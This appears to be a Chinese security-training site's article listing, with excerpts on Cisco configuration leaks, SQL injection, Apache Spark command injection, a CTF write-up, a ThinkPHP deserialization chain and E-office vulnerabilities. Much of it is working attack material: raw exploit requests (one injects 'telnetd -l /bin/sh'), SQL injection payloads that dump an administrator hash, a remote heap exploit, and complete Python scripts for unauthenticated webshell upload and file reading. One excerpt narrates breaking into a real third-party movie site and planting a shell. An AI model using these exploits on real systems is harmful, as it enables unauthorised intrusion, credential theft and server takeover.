蚁景网安 - 网络安全人才培养服务提供商

模糊测试工具AFL源码浅析

CISCO设备信息泄漏漏洞案例

前言在日常的渗透任务中，除了常见的集权设备，高危组件的漏洞挖掘，一些iot设备目标也是可以作为重点关注的存在。近期实战中遇到了几个cisco配置信息泄漏的案例，借此机会复习总结下cisco常见的漏洞。 cisco SMI 配置泄漏 Cisco SMI 是一种即插即用功能，可为 Cisco 交换机提供零接触部署并在 TCP 端口 4786 上进行通信。如果发现开放4786端口的cisco设备，那可以深入测试一下。 fofa 语句 protocol="smi" 影响目标还挺多的 git clone https://github.com/ChristianPapathanasiou/CiscoSmartInstallExploit cd CiscoSmartInstallExploit pip2 install tftpy python2 cisco.py [ip] 注意用python2运行,运行成功会下载目标的运行配置配置文件中存有设备用户密码，ACL配置，ftp配置账号密码等敏感信息如果想进一步分析配置文件可以下载 ccat 工具进行自动化分析 https://github.com/frostbits-security/ccatgit clone https://github.com/frostbits-security/ccat.git cd ccat pip3 install -r requirements.txt python3 ccat.py configuration_file 我们可以使用 --dump-creds 参数dump出账号密码文件名m500的可以用hashcat -m 500的掩码进行爆破,5700同理 CVE-2019-1652 && CVE-2019-1653 Cisco RV320 路由器的配置可以在未经身份验证的情况下通过设备的 Web 界面导出。 fofa 语句 app="CISCO-RV320” 对应poc ip:port/cgi-bin/config.exp 下载的配置文件中有账号和md5的密码,不过md5的格式为 md5($password.$auth_key)，其中 auth_key 是一个静态值，可以通过直接访问 / 路径找到。当然在通过 CVE-2019-1653 获得了账号和md5的密码后可以通过替换登录包的hash进行登录,无需解密后台可以配合 CVE-2019-1652 进行 rce github上的利用poc由于不支持目标的自签名证书 https://github.com/0x27/CiscoRV320Dump/blob/master/easy_access.py 这里就手动发包进行测试 POST /certificate_handle2.htm?type=4 HTTP/1.1 Host: x.x.x.x Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: mlap=RGVmYXVsdDk6Ojo6Y2lzY28= Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 319 page=self_generator.htm&totalRules=1&OpenVPNRules=30&submitStatus=1&log_ch=1&type=4&Country=A&state=A&locality=A&organization=A&organization_unit=A&email=ab%40example.com&KeySize=512&KeyLength=1024&valid_days=30&SelectSubject_c=1&SelectSubject_s=1&common_name=a%27%24%28telnetd%20-l%20%2Fbin%2Fsh%20- payload执行后会用telnet在本地监听1337口连接验证总结 cisco设备国内互联网公司和企事业用得不多，近年来都被国产品牌替换了。 python的poc经常会遇到一些历史遗留问题，比如tls版本过低，依赖库安装报错不兼容等等问题，建议还是用go写poc，利人利己。

记一次SQL注入的收获

一、发现漏洞 1.1. 发现这是一篇两年前的笔记了。之前平常喜欢看些电影影片，不想充值VIP，才发现的网站，但是这个网站A并不是主要测试的，而是通过发现他的兄弟网站B，然后进行渗透。 1.2. 测试有事没事对网站动一动，发现A存在XSS，但是并没有多大的利用价值，但是通过友情链接，跳转到了B，就觉得B可能也在同个位置存在XSS但是，令人惊讶的是，我没发现XSS，但是确发现存在SQLI。加了个’,直接把sql语句爆出来了，如下图1。图 1 二、漏洞利用 2.1 闭合规则原始的语句： SELECT `y80s_movies`.*, `y80s_photos`.`path` AS photo_path, `y80s_photos`.`share` AS photo_share FROM (`y80s_movies`) LEFT OUTER JOIN `y80s_photos` y80s_photos ON `y80s_photos`.`id` = `y80s_movies`.`photo_id` WHERE `y80s_movies`.`public` = '1' AND `y80s_movies`.`attribute` NOT LIKE '%%1%%' AND (name like '%XXX%' or aka like '%XXX%') ORDER BY `y80s_movies`.`update` DESC, `y80s_movies`.`id` DESC LIMIT 25 原始报文： HTTP/1.1 500 Internal Server Error Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Accept-Encoding, UserAccount Server: nginx Date: Thu, 29 Oct 2020 01:36:40 GMT Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.6.38 X-Cache: MISS from aws-jp08 X-Cache: MISS from asia-hk11 Connection: close Content-Length: 882 Array ( [0] => Error Number: 1064 [1] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or aka like '%xxx%') ORDER BY `y80s_movies`.`update` DESC, `y80s_movies`.' at line 6 [2] => SELECT `y80s_movies`.*, `y80s_photos`.`path` AS photo_path, `y80s_photos`.`share` AS photo_share FROM (`y80s_movies`) LEFT OUTER JOIN `y80s_photos` y80s_photos ON `y80s_photos`.`id` = `y80s_movies`.`photo_id` WHERE `y80s_movies`.`public` = '1' AND `y80s_movies`.`attribute` NOT LIKE '%%1%%' AND (name like '%XXX%' or aka like '%XXX'%') ORDER BY `y80s_movies`.`update` DESC, `y80s_movies`.`id` DESC LIMIT 25 [3] => Filename: /home/wwwroot/XXXX/libraries/datamapper.php [4] => Line Number: 1410 ) <html> <head> <title>Error</title> </head> <body> hi</body> </html> XXX为输入的位置，同上可以看出，会同时在两处插入，但其实只需要管一处即可，后面可以注释掉。当时在考虑，怎么闭合这个规则，怎么执行自己想执行的语句。但是可能被这么长的语句吓到了，不知道从何下手。也可能是因为自己数据库基础不扎实。其实仔细分析，都是可以化繁为简的。这语句也就是select 字段 from 表名（一个左外连接） where XXX and XXX and XXX order by XXX。以上是我想的，看看老王想的：这个构造看清大逻辑，select xxx from ta left outer join tb on ta.a=tb.b where con1=xxxxx and con2=xxxx oder by a.a,b.b limit 25，然后得出：注入是在whe 2.2 爆数据这步应该是最多的，一开始自己找不到闭合规则，经常会报错，而且还是乱码，如下图2：图 2 一开始猜测是回显了数据表，所以导致了乱码，但是并不是，应该只是服务器的问题。这服务器本来就不太稳定，换下查询数据，刷新页面，多试几次就好了。然后思路就想着，构造一个判断语句，通过是与否来判断数据库的信息，然后有了以下的两个payload： 1、%e4%ba%ba') and 1=1 or (‘1’=’1 2、%e4%ba%ba') and exists(select path from y80s_photos) or ('1'='1 但是这payload真的是太傻了，好在报错信息有提供表名和mysql默认表dual，不然都没法判断是否构造完成。接下来是内容由老王指导完成。通过union或者updatexml进行查询，内容有回显，一开始我并不知道的，后面通过百度查询到了updatexml用法，于是自己构造了个： 1、%e7%88%b1') and updatexml(1,concat('~',(select database()),'~'),3)--+ 获取了数据名80s，如下图3：图 3 既然可以回显，那紧接着，就是查询所有的表名。笔记：查询数据库中所有表名 select table_name from information_schema.tables where table_schema='数据库名' and table_type='base table'; select table_name from information_schema.tables where table_schema='数据库名' 查询指定数据库中指定表的所有字段名column_name select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' 于是构造了 payload：%e7%88%b1') and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='80s' limit 0,1),'~'),3)--+ 其实limit是后面加的，服务器返回：Subquery returns more than 1 row，但是这边只能显示一条，所以一开始思路是使用limit一条一条去查出来，如下图4、图5：图 4 图 5 利用burp-Intruder爆破出数据库，但是，这样太慢了。老王提供了个函数group_concat()，group_concat()类似一个聚集函数，把所有内容拼接成字符串，默认用逗号隔开。于是我的payload就变成： %e6%98%9f') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='80s'),'~'),3)--+ 但是，人算不如天算，他回显内容有限制长度的，如下图6：图 6 看Y80应该可以明显感觉断了，及时看不出来，也不应该就这几个表吧！这时候想到，我们岂不是可以通过limit限制内容，把已经看到了的不输出，我真是天才，然后我构造了payload： %e6%98%9f') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='80s' limit 6,2),'~'),3)--+ 发现页面居然正常跳转了，没有报错，我人傻了，估计是sql语句又哪里有问题了吧！后面看了老王的，他构造的是： 123333') and updatexml(1,concat(0x7e,(select group_concat(x.movie_id) from (select movie_id from hits limit 3,3)x),0x7e),1)--+ select group_concat(x.movie_id) from x，从x表查询movieid，然后聚集成一行，x表是个别名，x = seelect movie_id from hits limit 3,3，从hits查movieid，从记录3往后查3条，结果是个一列三行的数据临时表，然后前面配合聚集，把这三行连接，这样就不用limit a,1这种，每次限制一行记录，这个可以limit a,5这样，一次查五条。搜嘎！由于我只是想登入后台，尝试找出管理员的表即可，我就还是一个一个试，最终找到管理员表y80s_managers，然后根据payload： %e6%98%9f') and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='80s' and table_name='y80s_managers'),'~'),3)--+ 查询出字段名id,name,password,right_id,lock等，如下图7：图 7 但是我们主要还是账号名密码，所以继续！构造payload： %e5%a6%bb') and updatexml(1,concat('~',(select group_concat(name) from y80s_managers),'~'),3)--+ 如下图8：图 8 可以看到，只有一个账户，name为me****zz，再查询密码，如下图9：图 9 忘记这个是有限制字段的，也没注意看是否是以~结尾，然后拿去md5解密，发现解不开，数了一下，31位的md5？这时候才发现，后面还有。于是使用substr函数，去截取后面的字段，回显！ Payload：%e6%96%b0') and updatexml(1,concat('~',(select substr(password,31) from y80s_managers),'~'),3)--+ Substr(str,pos,len),pos开始的位置，len为长度，str字符串，len没输入的时候默认是pos开始截取到最后的位置。于是有了以下图10：图 10 果然掉了一位，最后得到md5：9356*************63c 三、解密账号密码 3.1成功登录 Md5解开后得到账号名密码： Me****zz，935********63c(pj*****@) 然后使用dirsearch，搜索出后台（其实我是先找到后台才想着去注入的），成功登录，如下图11：图 11 原本想删除登录记录的，但是发现这后台功能有点简陋，好像没有发现有登录记录之类的，就没先下了，后续再二次进攻！ 3.2 收获其他信息以下是收集到的其他信息： database：80s mysql5.6.44 table:hits,y80s_ads,y80s_articles,y80s_bigphotos,y80s_caijis,y80s_cast_infos,y80s_casts,y80s_casts_movies,y80s_directors_movies,y80s_directors, y80s_dlurls,y80s_dlurls_movies,y80s_doubans,y80s_duoshuo_comments，y80s_forhotmovies，y80s_hits，y80s_hotwords，y80s_infos，y80s_managers，y80s_moviedesc_ups y80s_ads: id title name content y80s_managers： id,name,password,right_id,lock 四、寻找上传点发现该网站存在设置影片的图片，直接上免杀马。免杀马是github上大佬写的生成工具，已测试过是可以过360和D盾的。链接：https://github.com/pureqh/Troy 服务器直接报错。多番尝试发现无法上传马。还发现了数据库备份，但是貌似无法修改数据库扩展名。五、柳暗花明又一村在查看网站功能的时候，我又发现了另一个好东西：配置文件编辑。直接把一句话木马写到配置文件里面。通过写入<?php phpinfo();?>后，发现在每个页面初始化的时候，都会去调用该配置文件。直接getshell。六、小结闭合规则是花费时间最长的，还有后面要利用的时候，构造payload也是我花费时间最多的，基本都是百度上查，很多都不懂，两个的根本原因还是因为对sql注入，乃至数据库的基础都不是很懂，很多函数，都不知道，不知道有功能有什么函数，在利用的时候就难以下手，耗费大量时间。其次还可通过mysql直接写入shell的，这个也是后面才知道的，不过写入shell的前提条件较为苛刻。

Apache Spark UI 命令注入漏洞 CVE-2022-33891

漏洞简介 Apache Spark UI 提供了通过配置选项 spark.acls.enable。使用身份验证过滤器，这检查用户是否有访问权限来查看或修改应用。如果启用了 ACL，则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后恶意用户可能能够访问权限检查功能，最终将根据他们的输入构建一个 Unix shell 命令，并且执行它。这将导致任意 shell 命令执行。影响版本：Apache Spark 版本 3.0.3 及更早版本，版本 3.11 至 3.1.2 ，以及版本 3.2.0 至 3.2.1 漏洞复现　　下载 Apache Spark 3.2.1 https://archive.apache.org/dist/spark/ 　　https://archive.apache.org/dist/spark/spark-3.2.1/spark-3.2.1-bin-hadoop2.7.tgz 　　根据描述是需要开启 acl 功能才可以触发漏洞　　开启 ACL 可以通过设定启动时的参数 ./spark-shell --conf spark.acls.enable=true 或者在 conf/spark-defaults.conf 中添加 spark.acls.enable true 　　‍ 　　构造 poc http://localhost:4040/?doAs=`[command injection here]` 漏洞分析　　为了方便调试在启动脚本中添加上调试参数 export SPARK_SUBMIT_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005" 　　输入错误的执行语句时的报错信息　　‍ 　　漏洞的触发大概就在 org.apache.spark.security.ShellBasedGroupsMappingProvider.getUnixGroups 　　漏洞的调用栈应该为 org.apache.spark.ui.HttpSecurityFilter.doFilter(HttpSecurityFilter.scala:71) org.apache.spark.SecurityManager.checkUIViewPermissions(SecurityManager.scala:238) org.apache.spark.SecurityManager.isUserInACL(SecurityManager.scala:381) org.apache.spark.util.Utils$.getCurrentUserGroups(Utils.scala:2523) org.apache.spark.security.ShellBasedGroupsMappingProvider.getGroups(ShellBasedGroupsMappingProvider.scala:34) org.apache.spark.security.ShellBasedGroupsMappingProvider.getUnixGroups(ShellBasedGroupsMappingProvider.scala:43) 　　加上断点进行调试分析　　org.apache.spark.ui.HttpSecurityFilter#doFilter 　　获取到参数 doAS 赋值为 effectiveUser 传到函数 checkUIViewPermissions 　　org.apache.spark.SecurityManager#checkUIViewPermissions 　　org.apache.spark.SecurityManager#isUserInACL 　　org.apache.spark.util.Utils$#getCurrentUserGroups 　　org.apache.spark.security.ShellBasedGroupsMappingProvider#getGroups 　　org.apache.spark.security.ShellBasedGroupsMappingProvider#getUnixGroups 　　通过反引号将想要执行的命令包含起来，拼接到原本的命令执行语句中　　org.apache.spark.util.Utils$#executeAndGetOutput 　　org.apache.spark.util.Utils$#executeCommand 漏洞补丁　　新版本的修复删除了 ShellBasedGroupsMappingProvider 中的 bash 的调用，最后执行命令的语句应该变为/usr/bin/id -Gn + 传入参数

Nmap抓包分析与绕过Windows防火墙

2022美团CTF个人决赛WP

Reverse ROP 解析data的ROP，一点一点还原 from pwn import * opcode = open('data', 'rb').read() opcode_gadget = opcode[0x30+8:] for offset in range(0, len(opcode_gadget), 8): print(f'{hex(u64(opcode_gadget[offset:offset+8]))}') 提取出来密文，转成64位的 cipher = [0x98, 0x7A, 0xDF, 0x57, 0xC6, 0xE3, 0x18, 0xC7, 0x11, 0x07, 0xC7, 0xD4, 0x02, 0xD2, 0x9E, 0x43, 0x3A, 0xCE, 0x32, 0x04, 0x33, 0x2D, 0x30, 0x30, 0xAB, 0x03, 0x84, 0xB2, 0xA9, 0x09, 0xAA, 0x40] cipher=[int.from_bytes(bytes(cipher[i:i+8]), 'little') for i in range(0,32,8)] 分析gadget都是通过设置rax和参数寄存器，然后call rax触发函数，函数只有4种流程是一开始将一个32位字符放到bss段中，这个bss贴近我们输入放入bss段的位置，参与到运算然后开始rop链，读取42个字符，提取uuid中32位字符，进行加密运算，运算的最后一部分是swap的操作，测试得知顺序改变为[2,3,0,1] 最后对比密文跳转结果照着指令写一个逆回来的过程 #include <stdio.h> #include <stdlib.h> #include <stdint.h> uint64_t bss_flag[] = {3472325009839672890, 4659547388917318571, 14346467054006008472, 4872562756463036177, 3545518422457791288, 3689401600665085541, 3906648618554712880, 7004559110426617186}; void add(int i,int j){ bss_flag[i] -= bss_flag[j]; } void sub(int i,int j){ bss_flag[i] += bss_flag[j]; } void xor1(int i,int j){ bss_flag[i] ^= bss_flag[j]; } int main(){ sub(0x0,0x7); add(0x1,0x5); sub(0x3,0x7); add(0x0,0x5); add(0x0,0x7); sub(0x3,0x7); add(0x0,0x5); xor1(0x2,0x5); xor1(0x2,0x5); sub(0x3,0x7); sub(0x2,0x6); xor1(0x0,0x7); add(0x2,0x4); add(0x1,0x4); xor1(0x1,0x7); xor1(0x0,0x7); sub(0x0,0x5); sub(0x0,0x7); sub(0x0,0x5); add(0x1,0x7); xor1(0x1,0x5); add(0x1,0x6); sub(0x1,0x4); xor1(0x2,0x4); add(0x1,0x4); sub(0x0,0x6); sub(0x2,0x7); add(0x1,0x6); sub(0x2,0x5); add(0x0,0x7); xor1(0x3,0x6); add(0x2,0x4); xor1(0x0,0x6); xor1(0x0,0x5); xor1(0x3,0x7); xor1(0x0,0x4); xor1(0x2,0x5); xor1(0x2,0x6); xor1(0x2,0x6); xor1(0x3,0x4); xor1(0x0,0x7); xor1(0x2,0x5); xor1(0x0,0x4); xor1(0x3,0x5); xor1(0x1,0x6); xor1(0x3,0x7); xor1(0x0,0x4); xor1(0x1,0x4); xor1(0x2,0x7); xor1(0x1,0x7); xor1(0x0,0x4); xor1(0x2,0x6); xor1(0x0,0x5); xor1(0x1,0x7); xor1(0x0,0x5); xor1(0x0,0x4); xor1(0x3,0x6); xor1(0x1,0x7); xor1(0x2,0x5); xor1(0x0,0x7); xor1(0x0,0x7); xor1(0x2,0x4); xor1(0x3,0x4); xor1(0x3,0x7); printf("%s",(char *)bss_flag); // flag{eb4781b3-e3c5-475e-8af4-2fa50468f485} } crackme go语言，一开始我ida还f5反编译不了，换了个才可以，难顶直接sm4加密和rc4，sm4密钥写死在代码里 rc4的key在linese.txt里，密文也在里面 exp: from binascii import unhexlify from Crypto.Cipher import ARC4 from sm4 import SM4Key c= unhexlify(b'cc53de43058c79e4e13dbfe4e1ece82ec7d70b0fe460d50a6e2dfbbdac0b22173124ac7dee560b026b9b4cf1394c9493ad62874b4ef2125bbe27f99827d2a801b1b994c90bc31caea1cc9dc09362b518') key = b'd0cac74c1bbeea071817360e491585e8' cipher = ARC4.new(key) m = cipher.decrypt(c) key0 = SM4Key(b'xc08asb890ajds0a') print(key0.decrypt(m)) Misc What is that stegsolve直接切换几个通道就可以看到 pwn hello 直接网上查到kernel pwn qemu 的非预期 ctrl+a然后c进入shell，cat flag没有权限，要再提权，删除/sbin/poweroff然后exit就可以到su权限，再cat flag就可以 heap 一个UAF+数组上溢出这里可以输入负数，可以数组溢出就可以往上泄露地址，泄露出程序基地址后再相同手法修改free_hook就可以。 from pwn import * context.log_level='debug' #p=process('./pwn') p=remote('47.95.8.59',42283) elf=ELF('./pwn') #libc=ELF('/usr/lib/freelibs/amd64/2.27-3ubuntu1.5_amd64/libc.so.6') libc=ELF('./libc.so.6') def add(size): p.sendafter(b'>\n', b'1') p.sendafter(b'add?\n', str(size).encode()) def dele(index): p.sendafter(b'>\n', b'2') p.sendafter(b'up?\n', str(index).encode()) def edit(index,size,content): p.sendafter(b'>\n', b'3') p.sendafter(b'write?\n', str(index).encode()) p.sendafter(b'write?\n', str(size).encode()) p.sendafter(b'Content:', content) def show(index): p.sendafter(b'>\n', b'4') p.sendafter(b'review?\n', str(index).encode()) show(-11) p.recvuntil('Content:') probase=u64(p.recv(6).ljust(8,b'\x00'))-0x4008 arraddr=probase+0x4060 add(0x10) add(0x10) add(0x10) dele(0) dele(1) dele(2) edit(1,8,p64(arraddr)) add(0x10) add(0x10) add(0x10) edit(2,8,p64(probase+elf.got['puts'])) show(0) libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-libc.symbols['puts'] free_hook=libc_base+libc.symbols['__free_hook'] system=libc_base+libc.symbols['system'] edit(2,8,p64(free_hook)) edit(0,8,p64(system)) add(0x10) edit(3,8,b'/bin/sh\x00') dele(3) p.interactive()

Java反序列化之C3P0链学习

ThinkPHP6.0.13反序列化漏洞分析

1. 前言最近有点闲下来了，不找点事干比较难受，打算找点漏洞分析一下，于是就打算看看TP的一些漏洞，ThinkPHP6.0.13是TP的最新版，八月份有师傅提交了一个issue指出TP存在反序列化问题，网上也有些师傅分析了一波，不过断点下的比较多，而且部分方法没有阐明其用途，所以我也尝试详细的分析一波。下面先给出POC 2. 分析首先看看POC的起始点发现起始点在Psr6Cache这个类，我们进入这个类，不过没有发现__destruct或者__wakeup等常见的反序列化起始魔术方法，推测应该在其父类AbstractCache这个抽象类中。跟入AbstractCache类如图，成功发现本次反序列化链子的起始类。这里我们可以控制autosave这个属性为false，从而进入save方法。回到Psr6Cache类查看这个方法可以发现，pool属性和key属性我们都可控。因此可能存在两种路线，调用不同类的同名方法（getItem）。或者是直接尝试触发__call方法。我们来看看POC作者是怎么让反序列化进行下去的。作者用构造方法传入了exp，exp其实就是在实例化Channel类。我们进入Channel类查看 Channel类中有一个__call方法，那么作者是选择触发__call来让链子继续下去。这个call方法接受了两个参数，method是写死的(getItem)，parameters是可控的（即前面可控的key属性）跟入log方法查看，其接受三个传参（但是其实对后续的链子没啥用），传入record方法跟入record方法再返回查看作者的POC，发现其控制lazy属性为false，让函数进入最后一个if分支执行save方法那么save方法应该是比较关键的方法了，跟入save方法，这里面有三个可能被利用的点，作者选择了哪一个呢？根据POC不难发现作者选择了控制logger属性，利用构造函数对其赋值，令其为Socket类的对象在这个类中，我们找到了一个复杂的同名方法，其中有大量的操作。我们继续来看作者是怎么构造的，作者控制config属性，给其赋值为数组。数组有如下内容关键在于这两个键值，作者控制config，让程序运行到调用invoke方法的分支同时，app属性可控，作者令app属性为App类的对象，我们进入App类这里先看看App类的的exists方法的情况，在其父类中找到了这个方法继续往后，这里对App类进行了唯一一个操作，控制了instances属性的值。这里控制其值是为了进入Request类，并且执行url方法作者在这里对Request类做出唯一的操纵，就是控制url属性的值。可以看出，如果url属性存在，那么就会进入第一个分支，其值等于本身。同时又注意到，complete我们之前传入的是true。因此最终返回的结果就是$this->domain().$url，url我们已经控制了，那么domain方法返回什么呢？ OK，这点我们就不用看了。分析了这么多，我们得到了$currentUri最后的值，就是： http://localhost/<?php system(\'calc\'); exit(); ?> currentUri作为一个数组被传入invoke了，根据链子的长度，达到invoke，我们的反序列化之旅就快结束了查看invoke，App类找不到这个方法，在他的父类里找到了这个方法这里可以看到。这个函数内有三分支走向，那么最终会走向哪里呢？根据我们之前$config[‘format_head’]的传入，首先我们传入的这个对象不是Closure的实例或者子类，并且也不满足第二个分支的条件因此进入到到第三个分支。我们跟进invokeMethod()方法。这里传入的$callabel就是[new \think\view\driver\Php,'display']、而$vars就是[‘http://localhost/<?php system(\'calc\'); exit(); ?>’] 注意，我们传入的$method是数组，因此进入第一个分支。把new \think\view\driver\Php （即对象）赋值给$class，’display’（即方法名）赋值给新的$method。然后下面进行了一个判断，如果$class是对象，那么其值就为它本身，因为我们传入的是对象，所以这里没什么变化。然后进入最关键的代码可以看到，把对象new \think\view\driver\Php 以及方法 display传入了ReflectionMethod。在最后，调用invokeArgs方法，传入了new \think\view\driver\Php对象，同时传入了$args 那么args是什么呢？我们跟入之后发现是一个处理函数，因为本人比较懒，而且到这都快分析完了，就不去硬读了，直接给结论，总之我们传入的 $vars ，也即 [‘http://localhost/<?php system(\'calc\'); exit(); ?>’] 其中的关键部分<?php system(\'calc\'); exit(); ?>保留了下来，并且进入到了后续的传参中继续往后看，对于这个函数(invokeArgs)，可以简单的类比call_user_func()，因此最后的关键代码其实只有这两行也即 $reflect = new ReflectionMethod(new \think\view\driver\Php,’display’); return $reflect->invokeArgs(new \think\view\driver\Php,’ <?php system(\'calc\'); exit(); ?>’) 常看tp反序列化的朋友就知道，已经结束咧！毕竟调用display方法了。但是上述这个调用ReflectionMethod类的操作到底是什么呢？我们可以借助如下实例来演示。所以说这玩意和call_user_func很像最后是display方法，没什么好说的了，content传入display方法中，eval执行命令了 3. 结语 TP的链子一如既往的有意思（以及复杂），特别是最后的ReflectionMethod类的用法上，如果不了解这个类以及类中的方法组合可以实现类似call_user_func函数的作用的话，那么就很容易错过这样一个精彩的漏洞。

记一次MCMS的审计之路

E-office Server_v9.0 漏洞分析

漏洞简介　　泛微e-office是一款标准化的协同OA办公软件，实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。由于泛微 E-Office 未能正确处理上传模块中输入的数据，未授权的攻击者可以构造恶意数据包发送给服务器，实现任意文件上传，并且获得服务器的webshell，成功利用该漏洞可以获取服务器控制权。未授权的攻击者可以构造恶意的数据包，读取服务器上的任意文件　　漏洞影响范围 E-office Server_v9.0 　　默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘，所以安装位置是 c:\eoffice 　　安装完成后，服务默认在 8082 端口通过主机名或 ip 地址都可以访问到　　代码位置在 C:\eoffice\webroot 同样代码也是被加密了的　　通过免费的解密网站获得了加密的具体信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/ 　　利用工具进行批量的解密，因为工具点击一次只能进行一次解密，所以利用模拟点击的工具进行模拟点击 https://github.com/taojy123/KeymouseGo 任意文件上传漏洞漏洞利用　　/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= 　　‍ POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 Host: 10.0.21.14:8082 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3 Content-Length: 175 ------WebKitFormBoundaryykJoMlQs3JMOsgi3 Content-Disposition: form-data; name="Filedata"; filename="1.php" <?php phpinfo();?> ------WebKitFormBoundaryykJoMlQs3JMOsgi3-- 　　上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php 漏洞分析　　漏洞的主要位于 general/index/UploadFile.php 　　通过 $_GET 方法获取的参数 m，调用 UploadFile 中的任意方法　　我们选择其中的 uploadPicture 方法　　没有对传入的文件进行过滤，如果传入一个 php 文件，命名为 1.php 最后上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/" 利用脚本 import sys import requests def request_shell(url): targeturl = url + "/images/logo/logo-eoffice.php" response = requests.get(targeturl) if(response.status_code == 200): print("获取 shell 成功，shell地址为："+targeturl) def request_upload(url,data): targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=" targetfile = {'Filedata':('upload.php',data,'text/plain')} response = requests.post(url = targeturl, files = targetfile) if(response.status_code == 200): print("上传成功") def read_uploadfile(url,filename): with open(filename) as f: data = f.read() request_upload(url,data) def upload_file(url,filename): if (filename == "phpinfo.php"): data = "<?php phpinfo(); ?>" request_upload(url,data) else: read_uploadfile(url,filename) def main(): if len(sys.argv) < 3: print("Usage: upload_file.py targeturl filename\n" "Example: python upload_file.py http://10.0.21.14:8082 phpinfo.php") exit() url = sys.argv[1] filename = sys.argv[2] upload_file(url,filename) request_shell(url) if __name__ == '__main__': main() 任意文件下载漏洞漏洞利用　　‍ GET /inc/attach.php?path=/../../../../../1.txt HTTP/1.1 Host: 10.0.21.14:8082 Origin: http://10.0.21.14:8082 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close 　　‍ 　　‍ 漏洞分析　　inc/attach.php 　　‍ 　　直接传入参数 $path 最后会读取 $path 的内容并将结果返回出来，我们注意到利用未授权就可将文件下载下来，从代码层面并没有看出来原因，但是通过浏览器直接访问时无法访问到，进行了 302 跳转，通过 burpsuite 就可以访问到，攥写脚本禁止 302 跳转也可以读取出来。　　漏洞的主要来源位于　　我们看一下文件的下载链接利用脚本 import sys import requests import re def save_reponse(re_result,filename): filename=re.findall("[^/]+quot;,filename)[0] # print(filename) with open(filename, 'w',encoding='gb18030') as f: f.write(re_result) def re_response(response): re_result = response[1507:] return re_result def read_file(url,filename): targeturl = url + "/inc/attach.php?path="+filename response = requests.get(url = targeturl, allow_redirects=False) # print(response.text) re_result = re_response(response.text) print(re_result) save_reponse(re_result,filename) def main(): if len(sys.argv) < 3: print("Usage: upload_file.py targeturl filename\n" "Example: python read_file.py http://10.0.21.14:8082 attach.php") exit() url = sys.argv[1] filename = sys.argv[2] read_file(url,filename) if __name__ == '__main__': main() 　　还有一些 SQL 注入漏洞，还可以继续进一步的进行审计分析。

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页